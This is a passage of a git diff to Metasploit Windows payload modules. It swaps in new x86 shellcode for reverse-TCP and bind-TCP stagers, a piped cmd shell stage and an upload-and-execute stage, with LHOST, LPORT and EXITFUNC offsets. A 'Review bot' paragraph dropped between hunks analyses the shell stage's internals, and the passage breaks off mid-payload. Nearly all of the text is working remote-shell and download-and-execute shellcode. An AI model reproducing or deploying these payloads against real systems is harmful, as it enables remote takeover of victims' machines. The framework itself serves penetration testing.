@@ -34,36 +34,30 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 166, 'n' ], - 'LHOST' => [ 160, 'ADDR' ], - 'EXITFUNC' => [ 278, 'V' ], + 'LPORT' => [ 203, 'n' ], + 'LHOST' => [ 196, 'ADDR' ], + 'EXITFUNC' => [ 284, 'V' ], }, - 'Payload' => - "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" + - "\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" + - "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" + - "\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" + - "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" + - "\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" + - "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" + - "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" + - "\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" + - "\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" + - "\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" + - "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" + - "\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" + - "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff" + - "\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68" + - "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" + - "\xe2\x31\xc0\xf3\xaa\x95\x89\xfd\xfe\x42\x2d\xfe" + - "\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3" + - "\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51" + - "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" + - "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7" + - "\x79\xc6\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff" + - "\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0" - + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + 
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" + + "\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89" + + "\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24" + + "\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46" + + "\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E" + + "\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A" + + "\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05" + + "\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5" } )) end diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index deda01d04a..a077f17377 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -24,7 +24,7 @@ module Metasploit3 'Name' => 'Bind TCP Stager', 'Version' => '$Revision$', 'Description' => 'Listen for a connection', - 'Author' => ['hdm', 'skape'], + 'Author' => ['hdm', 'skape', 'Stephen Fewer '], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, 
@@ -32,34 +32,27 @@ module Metasploit3 'Convention' => 'sockedi', 'Stager' => { - 'Offsets' => - { - 'LPORT' => [ 276+1, 'n' ], - }, - 'Payload' => - "\xfc"+ - "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" + - "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" + - "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" + - "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" + - "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" + - "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b\x52" + - "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff\x31" + - "\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81" + - "\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68\x8e" + - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81" + - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00" + - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49" + - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" + - "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf" + - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04" + - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0" + - "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53" + - "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53" + - "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55" + - "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff" + - "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18" + - "\xff\xd3" + 'Offsets' => { 'LPORT' => [ 201, 'n' ] }, + 'RequiresMidstager' => false, + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + 
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + + "\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" + + "\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" + + "\x6E\x4D\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F" + + "\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58" + + "\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56\x53\x57\x68\x02\xD9" + + "\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3" } )) end diff --git a/modules/payloads/stagers/windows/passivex.rb b/modules/payloads/stagers/windows/passivex.rb index 07fb6f52b7..0d37407f3e 100644 --- a/modules/payloads/stagers/windows/passivex.rb +++ b/modules/payloads/stagers/windows/passivex.rb @@ -100,5 +100,18 @@ module Metasploit3 # Return the updated payload return p end - + + # for now we must let this payload use the old EXITFUNC hash values. + def replace_var(raw, name, offset, pack) + super + if( name == 'EXITFUNC' ) + datastore[name] = 'thread' if not datastore[name] + raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh' + raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread' + raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process' + return true + end + return false + end + end \ No newline at end of file 
diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb
index 457d12b90b..c7206b56ef 100644
--- a/modules/payloads/stagers/windows/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/reverse_tcp.rb
@@ -24,7 +24,7 @@ module Metasploit3
 'Name' => 'Reverse TCP Stager',
 'Version' => '$Revision$',
 'Description' => 'Connect back to the attacker',
- 'Author' => ['hdm', 'skape'],
+ 'Author' => ['hdm', 'skape', 'Stephen Fewer '],
 'License' => MSF_LICENSE,
 'Platform' => 'win',
 'Arch' => ARCH_X86,
@@ -32,32 +32,26 @@ module Metasploit3 'Convention' => 'sockedi', 'Stager' => { - 'Offsets' => - { - 'LHOST' => [ 263, 'ADDR' ], - 'LPORT' => [ 270, 'n' ], - }, - 'Payload' => - "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" + - "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" + - "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" + - "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" + - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" + - "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x31\xd2\x64\x8b" + - "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x6a\x18\x59\x31\xff" + - "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0" + - "\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a\x10\x8b\x12\x75\xdb\x5e\x53\x68" + - "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6" + - "\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00" + - "\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa" + - "\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00" + - "\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05" + - "\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b" + - "\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40" + - "\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11" + - "\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06" + - "\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53" + - "\x57\xff\x55\x18\xff\xd3" + 'Offsets' => { 'LHOST' => [ 196, 'ADDR' ], 'LPORT' => [ 203, 'n' ], }, + 'RequiresMidstager' => false, + 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + + "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" + + 
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" + + "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" + + "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" + + "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" + + "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" + + "\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" + + "\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" + + "\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" + + "\xD5\x89\xC7\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A" + + "\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x6A\x00\x6A\x04\x56\x57" + + "\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00" + + "\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x53\x6A\x00\x56" + + "\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" + + "\xEC\xC3" } )) end diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index cbc816c264..6ac48a69d1 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -22,7 +22,7 @@ module Metasploit3 'Name' => 'Windows Command Shell', 'Version' => '$Revision$', 'Description' => 'Spawn a piped command shell', - 'Author' => 'spoonm', + 'Author' => [ 'spoonm', 'Stephen Fewer ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, 
@@ -35,39 +35,23 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'EXITFUNC' => [ 443, 'V' ]
+ 'EXITFUNC' => [ 210, 'V' ]
 },
- 'Payload' =>
- "\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00\x00"+
- "\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"+
- "\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31"+
- "\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54"+
- "\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c"+
- "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc2\x08\x00\x6a\x30\x59"+
- "\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c\xad\x8b\x58\x08\x5e\x53\x68"+
- "\x8e\x4e\x0e\xec\xff\xd6\x97\x53\x56\x57\x8d\x44\x24\x10\x50\xff"+
- "\xd7\x50\x50\x50\x68\xb6\x19\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70"+
- "\xe9\xff\xd6\x95\x68\x08\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec"+
- "\x10\x89\xe5\x89\xee\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51"+
- "\x56\xad\x56\x53\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0"+
- "\x89\xe0\x6a\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68"+
- "\x43\x4d\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab"+
- "\x83\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"+
- "\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc\x54"+
- "\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72\xfe\xb3"+
- "\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4\x89\xe7\x6a"+
- "\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0\x31\xc0\x50\x57"+
- "\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07\xb4\xff\x55\x20\xff"+
- "\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74\x36\xe8\x77\x00\x00\x00"+
- "\x50\x89\xe1\x50\x51\x56\x57\xff\x75\x0c\x53\x68\x16\x65\xfa\x10"+
- "\xff\x55\x20\xff\xd0\x85\xc0\x74\x50\x31\xc0\x59\x39\xc8\x74\x11"+
- "\x50\x51\x57\xff\x75\x28\xff\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb"+
- "\xab\x89\xe0\xe8\x3f\x00\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28"+
- "\xff\x55\x14\x31\xc9\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52"+
- "\x50\x57\xff\x75\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0"+
- "\x85\xc0\x74\x05\x31\xc0\x59\xeb\xc8\x53\x68\x7e\xd8\xe2\x73\xff"+
- "\x55\x20\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75"+
- "\x28\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3"
+ 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+ "\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6\x6A\x12\x59\x56" +
+ "\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24\x10\xC6\x00\x44" +
+ "\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56\x68\x79\xCC\x3F" +
+ "\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF" +
+ "\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C" +
+ "\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
 }
 ))
 end
diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb
index 481de31ca8..63903dea7d 100644
--- a/modules/payloads/stages/windows/upexec.rb
+++ b/modules/payloads/stages/windows/upexec.rb
@@ -22,7 +22,7 @@ module Metasploit3
 'Name' => 'Windows Upload/Execute',
 'Version' => '$Revision$',
 'Description' => 'Uploads an executable and runs it',
- 'Author' => 'vlad902',
+ 'Author' => ['vlad902', 'Stephen Fewer ' ],
 'License' => MSF_LICENSE,
 'Platform' => 'win',
 'Arch' => ARCH_X86,
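Review bot: The new stage starts the shell as the bare command line `cmd` (`\x68\x63\x6D\x64\x00`) with a NULL lpApplicationName (the final `\x56` before the CreateProcessA hash), so the name is resolved through CreateProcess's search order, which, as documented, consults the parent process's current directory before the system directory; a planted `cmd.exe` there is what the session would run, and since an absolute path costs bytes this is at least worth a caveat in the module description. The `'EXITFUNC' => [ 210, 'V' ]` offset lands on the imm32 of `mov ebx, <hash>` (`\xBB\xE0\x1D\x2A\x0A`), which the later `cmp bl, 0xE0` after GetVersion compares against to decide between ExitThread and RtlExitUserThread, but nothing in the file records that; a comment like `# EXITFUNC offset = imm32 of 'mov ebx, hash' before the GetVersion/cmp bl check` would keep the next regeneration from silently desynchronising the patch point. The socket in edi is handed to the child as all three std handles with bInheritHandles set (`\x57\x57\x57`, `\x46\x56`), which is what the piped-shell description implies, so no issue there.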
@@ -31,34 +31,33 @@ module Metasploit3
 {
 'Offsets' =>
 {
- 'EXITFUNC' => [ 385, 'V' ]
+ 'EXITFUNC' => [ 368, 'V' ]
 },
- 'Payload' =>
- "\x81\xec\x40\x00\x00\x00\xfc\x89\xfb\xe8\x48\x00\x00\x00\x60\x8b" +
- "\x6c\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b" +
- "\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0" +
- "\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b" +
- "\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b" +
- "\x89\x6c\x24\x1c\x61\xc3\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b" +
- "\x70\x1c\xad\x8b\x40\x08\x50\x89\xe6\x68\x8e\x4e\x0e\xec\xff\x36" +
- "\xff\x56\x04\x66\x68\x00\x00\x66\x68\x33\x32\x68\x77\x73\x32\x5f" +
- "\x89\xe5\x55\xff\xd0\x89\x46\x08\x68\xb6\x19\x18\xe7\xff\x76\x08" +
- "\xff\x56\x04\x89\x46\x0c\x6a\x00\x6a\x04\x55\x53\xff\x56\x0c\x8b" +
- "\x7d\x00\xe8\x0b\x00\x00\x00\x43\x3a\x5c\x74\x6d\x70\x2e\x65\x78" +
- "\x65\x00\x58\x89\x46\x10\x68\xa5\x17\x00\x7c\xff\x36\xff\x56\x04" +
- "\x6a\x00\x6a\x06\x6a\x04\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\xff" +
- "\x76\x10\xff\xd0\x89\x46\x14\x81\xec\x04\x08\x00\x00\x89\xe5\x68" +
- "\x1f\x79\x0a\xe8\xff\x36\xff\x56\x04\x89\x46\x18\x6a\x00\x68\x00" +
- "\x08\x00\x00\x55\x53\xff\x56\x0c\x29\xc7\x50\x89\xe1\x6a\x00\x51" +
- "\x50\x55\xff\x76\x14\xff\x56\x18\x58\x85\xff\x75\xdf\x68\xfb\x97" +
- "\xfd\x0f\xff\x36\xff\x56\x04\xff\x76\x14\xff\xd0\x6a\x50\x59\x29" +
- "\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42" +
- "\x2c\x93\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x36\xff" +
- "\x56\x04\x57\x52\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x10\x51\xff" +
- "\xd0\x68\xad\xd9\x05\xce\xff\x36\xff\x56\x04\x6a\xff\xff\x37\xff" +
- "\xd0\x68\x25\xb0\xff\xc2\xff\x36\xff\x56\x04\xff\x76\x10\xff\xd0" +
- "\x68\xe7\x79\xc6\x79\xff\x76\x08\xff\x56\x04\xff\x77\xfc\xff\xd0" +
- "\x68\x7e\xd8\xe2\x73\xff\x36\xff\x56\x04\xff\xd0"
+ 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+ "\x6A\x7F\x58\xC1\xE0\x03\x29\xC4\x54\x50\x68\x30\xF3\x49\xE4\xFF" +
+ "\xD5\x8D\x04\x04\xC7\x00\x73\x76\x63\x2E\xC7\x40\x04\x65\x78\x65" +
+ "\x00\x89\xE0\x50\x6A\x00\x6A\x06\x6A\x02\x6A\x00\x6A\x07\x68\x00" +
+ "\x00\x00\xE0\x50\x68\xDA\xF6\xDA\x4F\xFF\xD5\x89\xC3\x54\x89\xE6" +
+ "\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" +
+ "\x04\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
+ "\x53\x53\x89\xE1\x6A\x00\x51\x56\x50\x53\x89\xC3\x6A\x00\x56\x53" +
+ "\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
+ "\x68\x2D\x57\xAE\x5B\xFF\xD5\x59\x68\xC6\x96\x87\x52\xFF\xD5\x57" +
+ "\x57\x57\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01" +
+ "\x01\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E" +
+ "\x56\x56\xFF\x74\x24\x78\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0" +
+ "\x4E\x56\x46\xFF\x30\x68\x08\x87\x1D\x60\xFF\xD5\x57\x68\x75\x6E" +
+ "\x4D\x61\xFF\xD5\xFF\x74\x24\x58\x68\xD7\x2E\xDD\x13\xFF\xD5\xBB" +
